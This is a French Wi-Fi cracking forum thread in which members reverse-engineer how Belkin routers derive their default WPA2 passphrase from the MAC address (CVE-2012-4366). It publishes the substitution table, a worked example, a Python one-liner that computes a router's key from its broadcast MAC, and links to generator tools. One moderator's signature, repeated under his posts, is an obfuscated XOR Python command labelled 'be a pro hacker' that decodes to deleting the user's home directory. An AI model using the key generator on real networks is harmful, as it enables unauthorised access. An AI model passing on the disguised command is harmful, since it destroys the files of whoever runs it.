Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 23-11-2012 08:47:15

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Faille Belkin CVE-2012-4366 : default WPA2 password = f(MAC)

Bonjour à tous !

Hier soir je suis tombé au détour d'un twitt sur un lien vers cette CVE : Insecure default WPA2 passphrase in multiple Belkin wireless routers

En gros, c'est comme pour les Bbox.

La passphrase par défaut des routeurs est générée en substituant le chiffre hexadécimal correspondant de l'adresse MAC WAN en utilisant une table de substitution statique :

Jakob Lell et Jörg Schneider a écrit :

Each of the eight characters of the default passphrase are created by substituting a corresponding hex-digit of the wan mac address using a static substitution table.


En l'occurence, pour les routeurs Belkin concernés :

  • Belkin Surf N150 Model F7D1301v1

  • Belkin N900 Model F9K1104v1

  • Belkin N450 Model F9K1105V2

Car pour un type de routeurs, les mecs ont dit :

Jakob Lell et Jörg Schneider a écrit :

The following device uses a variation of the algorithm and the password consists of uppercase hex digits. When using our algorithm with the wlan mac of the device, the first 5 digits of the password are calculated correctly. It is likely that the algorithm differs only in the tables used.

C'est le modèle  Belkin N300 Model F7D2301v1, pour lequel, en français, le mot de passe est constitué de chiffres hexadéc imaux en majuscules. Pour celui-ci, les 5 premiers chiffres du mot de passe sont donnés correctement par leur algorithme, mais pas les 5 derniers.

Par conséquent :

Si quelqu'un retrouve "la static substitution table" dont ils parlent, il aura accès aux mots de passe par défaut.

C'est la que vous intervenez :

Votre mission si vous l'acceptez est de choper ce bout de code en python :

#!/usr/bin/python2.7
# -*- coding: utf-8 -*-

import random

# link between commercial fancy name and model name
association = {
"F9K1104v1":"N900",
"F9K1105V2":"N450",
"F7D2301v1":"N300"}


class router():
    def __init__(self, lmac="", wmac="", passw="", wpin="", model="", serial=""):
        # WLAN MAC
        self.lmac = lmac
        # WAN MAC
        self.wmac = wmac
        # default password
        self.passw = passw
        # default WPS pin
        self.wpin = wpin
        # model name
        self.model = model
        # serial number
        self.serial = serial

# Each of the eight characters of the default passphrase are created by substituting a corresponding hex-digit of the wan mac address using a static substitution table.

def friendship(mac):
    """ Friendship is magic"""
    return ''.join([hex(random.randrange(0x10))[2:] for i in mac.split(":")])

# Belkin N300 Model F7D2301v1
# the first 5 digits of the password are calculated correctly. It is likely that the algorithm differs only in the tables used.



if __name__ == "__main__":
    a = router("08:86:3B:51:99:0C", "08:86:3B:51:99:0E", "ae6da694", "53475961", "F9K1104v1", "321202GH102606")
    b = router("08:86:3B:C2:07:F4", "08:86:3B:C2:07:F5", "7e9697f4", "37932640", "F9K1105V2", "20214GE5200059")
    c = router("94:44:52:76:7A:CA", "94:44:52:76:7A:CA", "C47C7395", "61599130", "F7D2301v1", "121021G2101136")
    d = router("00:1C:DF:DA:FA:F9", "00:1C:DF:DA:FA:FA", ""        , "43510979", "F5D8231-4", "150831R8501045")
    e = router("00:22:75:CE:DB:6E", "00:22:75:CE:DB:6E", ""        , "51478575", "F5D8232-4", "20006823200146")

    liste = [a,b,c,d,e]

    for r in liste:
        print r.lmac, friendship(r.lmac)

Et de retrouver l'ordre de substitution des chiffres hexadécimaux, ainsi que la table de substitution.
Les trucs cool pour nous :
- adresse MAC WAN  = adresse MAC WLAN + 1 (ou deux)
- L'adresse MAC WLAN est broadcastée dans le cas d'un réseau réel (c'est pas nouveau ça)
- je vous ai pondu la classe bidon "router" avec les attributs, et le main ci-dessus en instancie 5, dont les données ont été chopées sur les photos de la page d'aide de Belkin

Les enfants, on a une 0-day à full-disclose !


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 23-11-2012 09:20:38

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Faille Belkin CVE-2012-4366 : default WPA2 password = f(MAC)

Si on a déjà les 5 premiers caractères et qu'il n'en manque que 5, on peut déjà se le jouer bruteforce : 5 caractères hexa, ça dépasse à peine le million de possibilités (16^5 = 1.048.576), c'est déjà un dico assez réduit pour qu'on puisse lancer une attaque en temps raisonnable smile

Le but de ton script c'est quoi ? Bruteforcer toutes les tables possibles pour trouver laquelle sert à générer les 5 derniers chiffres ? On est sûr que cette deuxième partie de table est statique, elle ?

Hors Ligne

#3 23-11-2012 10:03:25

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Faille Belkin CVE-2012-4366 : default WPA2 password = f(MAC)

Non, on n'a aucune info, sinon que le pass dépend directement de la MAC WAN. Du coup, il faut retrouver la méthode.
Mon script génère du random pour l'instant (:

On peut remarquer un truc déjà  :

08:86:3B:51:99:0C ae6da694
08:86:3B:C2:07:F4 7e9697f4
                   e     4

Les deux adresses ont le même préfixe :

08-86-3B   (hex)		Belkin International, Inc.
08863B     (base 16)		Belkin International, Inc.
				12045 East Waterfront Drive
				Playa Vista CA 90094
				UNITED STATES

Et elles ont donc 6 caractères communs sur 12 (et 6 différents)
Et leurs pass en ont 6 différents et 2 communs.
On peut donc supposer honnêtement (dans la mesure du raisonnable wink que les chiffres 2 et 8 du pass sont obtenus à partir de chiffres de la première moitié de la MAC.

Reste à trouver lesquels, et la table de substitution.
Pour ça, ce serait plus commode d'avoir beaucoup de données, juste deux box c'est un peu limite.

C'est assez clair ou pas ?


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#4 23-11-2012 17:43:37

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Faille Belkin CVE-2012-4366 : default WPA2 password = f(MAC)

C'est dommage qu'ils n'expliquent pas plus la table... ILs disent avec certitude que c'est le bssid.... cependant leur méthode non révélé est aproximatif vu qu'ils parlent de 5 caracères et on peut penser que la chose est un peu différente pour définir notre chaîne d'origine et tomber avec exactitude sur notre pass complet.
Un truc étrange, voici les données d'un routeur récent de beklin ( en caractères gras), la clef WPA à la même tronche
minuscules hexadécimales et chiffres

F5D8235-4 v 1000                               Model No > F9K1104  ver. 1                       
Belkin_N+_433A6C                               SSID     belfin.90c 
    00:22:75:43:3A:6C                              LAN/WLAN  D8:86:3B:51:99:0C
                                                               N900 DB Wireless N+ Routeur
WPA PSK: 4084ffc11d82eab5                     WPA:  ae6da694       
                 
fin essid=fin bssid > 6 caractères          finessid=finbssid > 3 carctères
pass > 16 caractères                            pass                  > 8 carcetres


vraiment les Passphrase on la même gueule et la proportion est gardée si nous supposons que ça pourrait aussi se passer avec le ssid.
En supposant bque c'est le même algorithme derrière mais j'en suis assez sûr.

Hors Ligne

#5 24-11-2012 14:39:57

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Faille Belkin CVE-2012-4366 : default WPA2 password = f(MAC)

Ah, je l'avais déjà celle-la, chopée sur leur site. Fais gaffe, son mot de passe par défaut est en hexa en majuscules (:
[edit] en fait, j'ai confondu avec le pass du 3ème routeur, celui en C7.. bref, passons [/edit]


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#6 24-11-2012 20:44:27

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Faille Belkin CVE-2012-4366 : default WPA2 password = f(MAC)

label3.JPG

Si ce sont des majuscules ce sont des toutes petites majuscules tongue. Nous parlons bien de la même chose?


@ antares
Creo que tienes un mail... wink

Hors Ligne

#7 24-11-2012 20:48:29

jlf
Membre Indétronable
Inscription : 06-10-2012
Messages : 195

Re : Faille Belkin CVE-2012-4366 : default WPA2 password = f(MAC)

en voyant ton image je pensais pas que le mot de passe par défaut etait aussi court

Hors Ligne

#8 24-11-2012 20:58:27

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Faille Belkin CVE-2012-4366 : default WPA2 password = f(MAC)

un brute force avec une carte je ne mrapelle plus exactement laquelle se fait en 9h30 (c'est expliqué dans le "no-full" disclosure), cette carte fait du 130 000 key/sec.
premier gros point faible...

Hors Ligne

#9 25-11-2012 12:06:48

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Faille Belkin CVE-2012-4366 : default WPA2 password = f(MAC)

Voilà où j'en suis pour l'instant, plus on aura de données, plus on pourra s'approcher le la table de substitution exacte.

code sur pastebin

Il va aussi falloir que je ponde du code pour merger des fichiers .ftable ensemble pour ponde une matrice.

Chaque ligne de la table de substitution contient l'index du chiffre à extraire et les 16 caractères à substituer.
Si on a :

[ 5 1 a 0 5 7 f 5 ..]

On prend le cinquième chiffre de la MAC, et si c'est un 0, on met un 1.
Si c'est un 1, on met un a.
Ainsi de suite.

To be continued (:


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#10 04-12-2012 06:55:24

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Faille Belkin CVE-2012-4366 : default WPA2 password = f(MAC)

900 N


Selección_008.png
Selección_009.png
Selección_010.png

Mon "comentario" est : "Enlève moi ce foutu plastic qu'on voit pas la mac"


                 450 N

Selección_011.png
Selección_012.png
Selección_013.png
NUYJ.png

Hors Ligne

#11 10-03-2014 11:42:23

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Faille Belkin CVE-2012-4366 : default WPA2 password = f(MAC)

Des nouvelles: C'EST BON ! smile

merci a eftecno et bigjim pour nous informer dans ce topic du forum kali

Belkin SSID and WPA/WPA2 correlation.

Les tables de conversion et le mécanisme furent révélés dans ce forum italien par Numlock : Wifi shark

Je n'ai ps trouvé le thème ou alors il faut s'inscrire pour y accéder, dans tous les cas eftecno a laissé sur le forum kali un lien vers le PDF explicatif que voici smile

BELKIN : WI-FI DEFAULT PASSWORD By Numlock


un petit pour la route avec les données de ce topic et de celui de WPSPIN

label3.JPG

C'est un belkin.XXX et le PDF nous dit ceci par rapport à ces modèles

belkin.xxx


MAC __:__:62:38:51:74
08:86:3B:B7:39:30
12345678
9BB03337
0123456789ABCDEF
944626378ace9bdf
9BB03337
aee96667
Casi particolari:
MAC __:__:62:38:51:74 dove MAC = WLAN MAC +2
MAC __:__:_2:38:5*:74 dove MAC = WLAN MAC +1

* = 1 = 6



en suivant donc le système de conversion

MAC __:__:62:38:51:74 dove MAC = WLAN MAC +2 parce que il y une différence de 2 entre la "mac interne" et le bssid

nous obtenons avec notre mac 3B:51:99:0E la table de conversion suivante

3 - B - 5 - 1 -  9 - 9 - 0 - E   - valeurs mac utilisés pour nôtre conversion                   
6 - 2 - 3 - 8 -  5 - 1 - 7 - 4   - indices

nous formons la chaîne de base pour la clef WPA en ordonnant les indices de 1 à 8 et en utiliant la valeur convertie grâce à la table

1 - 2 - 3 - 4 - 5 - 6 - 7 - 8    - indices ordonnés en ordre corissant                   
9 - B - 5 - E - 9 - 3 - 0 - 1   - chaîne obtenues après conversion

Maintenant nous faisons intervenir sur 9B5E9301 la seconde et dernière conversion en utilisant la tabler fixe donnée

0 1 2 3 4 5 6 7 8 9 A B C D E F     
9 4 4 6 2 6 3 7 8 a c  e 9 b d f

                     9 - B - 5 - E - 9 - 3 - 0 - 1
9B5E9301 >> a - e - 6 - d - a - 6 - 9 - 4

        ae6da694

donc voilà,
il faudra que je jette un coup d'oeil aux données ( mais où j'ai ça maintenant tongue ) que j'ai d'un routeur que l'on me prêta il y a pas mal de temps en arrière ( belkin je ne sais combien N+ ) et qui avait le pass avec une longitude de 10 mais la clef avait  exactement la même tronche que celle crackées.



Enjoy smile

Hors Ligne

#12 11-03-2014 09:14:11

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Faille Belkin CVE-2012-4366 : default WPA2 password = f(MAC)

Super nouvelle !
Je ne parviens pas à récupérer le document sur zippyshare, peux-tu l'héberger sur le forum ?


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#13 11-03-2014 09:49:36

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Faille Belkin CVE-2012-4366 : default WPA2 password = f(MAC)

J'ai fait un petit one-liner :

python -c 'import struct as s;
print("".join(["944626378ace9bdf"[int(i,16)]for i in"".join([s.pack(">I",1+s.unpack(">I","08863B053A41"[-8:].decode('hex'))[0]).encode('hex')[int(u)]for u in"51274063"])]));'

L'adresse MAC est au milieu. La version en moins de 140 caractères est ici : https://twitter.com/qolund/status/443306002516312064

Il me semble (d'après les commentaires dans mon bout de code sur pastebin) que certains modèles utilisent une autre table de substitution.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#14 11-03-2014 16:55:16

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Faille Belkin CVE-2012-4366 : default WPA2 password = f(MAC)

Je ne parviens pas à récupérer le document sur zippyshare, peux-tu l'héberger sur le forum ?

Tu n'y arrives pas spawn???
un backup : BELKIN-algo_pdf.zip

Hors Ligne

#15 26-03-2014 16:28:57

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Faille Belkin CVE-2012-4366 : default WPA2 password = f(MAC)

Voici en direct depuis lampiweb.com les tools publiés par maripuri et coeman76 pour générer les trois pass possibles



belkin-cmd & Belkin-GUI - "contraseñas por defecto de router's Belkin."

Sources : belkin-cmd & Belkin-GUI - contraseñas por defecto de router's Belkin.

L0rMPco.png


belkin cmd est un générateur écrit en C par Coeman76 qui s'invoque en ligne de commande

  -  belkin-cmd / Premier lien de téléchargement
  -  belkin-cmd / Deuxième lien de téléchargement


Belkin-GUI est une application graphique écrite en MMB par maripuri

  -  belkin-GUI / premier lien de téléchargement
  -  belkin-GUI / deuxième lien de téléchargement





Belkin GUI Linux Versión/Password por defecto routers Belkin

Sources : Belkin GUI Linux Versión/Password por defecto routers Belkin

9ZWz6r5.png

Voici la version GUI pour linux écrite en qt5 par coeman76, version 32 bits et version 64 bits

Pour pouvoir l'utiliser sous debian-kali-ubuntu vous devez installer qt5-default ( quelques MB ) 

(sudo) apt-get install qt5-default 

et avec Arch linux qy5-base, quelques MB aussi

(sudo) pacman -S qt5-base 

  -  Belkin GUI for linux 64 bits
  -  Belkin GUI for linux 32 bits

Licence
c2IZXIE.png


Avec les salutations du lampiweb team wink

VpTzzzzAE4.jpg

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
0 160 29-10-2016 11:12:05 par sukawa2007
15 747 22-09-2016 21:48:03 par koala
19 1123 05-09-2016 17:32:03 par david_01
11 443 05-09-2016 15:07:25 par MiscL
Épinglée :
185 185393 10-07-2016 19:35:20 par Seska

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.027 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]